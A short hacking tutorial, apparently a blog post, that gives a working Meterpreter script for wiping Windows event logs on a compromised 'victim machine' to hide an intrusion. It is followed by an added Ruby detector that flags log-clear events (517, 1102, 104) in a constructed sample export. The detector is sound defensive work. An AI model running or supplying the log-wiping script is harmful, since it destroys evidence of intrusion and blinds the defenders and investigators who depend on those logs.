In the last step of hacking, we need to "clear the tracks", also known as "housekeeping". If you use a Meterpreter payload, you can run this script to clear the logs on the victim machine:
ClearLogs.rb
# Meterpreter script: clears the Windows Event Logs on the victim machine
# via the eventlog API exposed by the meterpreter session (client).
evtlogs = [
  'security',
  'system',
  'application',
  'directory service',
  'dns server',
  'file replication service'
]
puts "Clearing Event Logs, this will leave an event 517"
evtlogs.each do |evl|
  puts "Clearing the #{evl} Event Log"
  log = client.sys.eventlog.open(evl)   # open the named log on the target
  log.clear                             # wipe it
end
puts "All Clear! You are a Ninja!"
Save it and call it from within Meterpreter:
meterpreter > run clearlogs
and bingo! All logs are cleared...
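As the script itself says, wiping the logs is not silent: it leaves a "log cleared" event behind. The following detector is an added example, not part of the post or of Metasploit. It runs over a constructed JSON Lines export of Windows events (the field names and the sample records are assumptions) and flags the clear events, then raises a stronger alert when several different logs on one host are cleared within seconds, which is exactly the pattern a loop like the one above produces.

```ruby
require 'json'
require 'time'

# (channel, event ID) pairs that record a cleared log.
# 517 is the pre-Vista Security-log-cleared event the post mentions;
# 1102 is its replacement from Vista onward; 104 in the System log is
# written when any other log (Application, System, ...) is cleared.
LOG_CLEARED = {
  ['Security', 517]  => 'Security log cleared (legacy event 517)',
  ['Security', 1102] => 'Security log cleared',
  ['System', 104]    => 'Event log cleared'
}.freeze

# Constructed sample export (JSON Lines), not a real capture: one host whose
# logs are wiped one after another, plus a lone clear on another host.
# The "cleared" field stands in for the log name found in the 104 message.
SAMPLE_EVENTS = <<~JSONL
  {"time":"2024-01-05T10:00:00Z","host":"WS01","channel":"Security","id":4624,"user":"alice"}
  {"time":"2024-01-05T10:05:01Z","host":"WS01","channel":"Security","id":1102,"user":"alice"}
  {"time":"2024-01-05T10:05:02Z","host":"WS01","channel":"System","id":104,"user":"alice","cleared":"System"}
  {"time":"2024-01-05T10:05:02Z","host":"WS01","channel":"System","id":104,"user":"alice","cleared":"Application"}
  {"time":"2024-01-05T10:05:03Z","host":"WS01","channel":"System","id":104,"user":"alice","cleared":"DNS Server"}
  {"time":"2024-01-05T11:30:00Z","host":"WS02","channel":"System","id":104,"user":"SYSTEM","cleared":"Application"}
JSONL

# Returns one alert hash per log-cleared event found in the export.
def find_log_clears(jsonl)
  jsonl.each_line.map { |l| JSON.parse(l) }.filter_map do |ev|
    reason = LOG_CLEARED[[ev['channel'], ev['id']]]
    next unless reason
    { time: Time.iso8601(ev['time']), host: ev['host'], user: ev['user'],
      cleared: ev['cleared'] || 'Security', reason: reason }
  end
end

# Flags hosts where at least min_logs distinct logs were cleared inside one
# window; a single clear by a maintenance task does not trip this.
def suspicious_hosts(alerts, window_seconds: 60, min_logs: 3)
  alerts.group_by { |a| a[:host] }.filter_map do |host, evs|
    sorted = evs.sort_by { |a| a[:time] }
    span = sorted.last[:time] - sorted.first[:time]
    logs = sorted.map { |a| a[:cleared] }.uniq
    next unless logs.size >= min_logs && span <= window_seconds
    { host: host, logs: logs, seconds: span.to_i, users: sorted.map { |a| a[:user] }.uniq }
  end
end

if __FILE__ == $PROGRAM_NAME
  alerts = find_log_clears(SAMPLE_EVENTS)
  alerts.each { |a| puts "#{a[:time]} #{a[:host]} #{a[:user]}: #{a[:reason]} (#{a[:cleared]})" }
  suspicious_hosts(alerts).each { |s| puts "ALERT #{s[:host]}: #{s[:logs].size} logs cleared in #{s[:seconds]}s by #{s[:users].join(',')}" }
end
```

On a real estate the same logic applies to events exported from the hosts or forwarded to a collector; clearing the logs locally does not remove copies already shipped elsewhere.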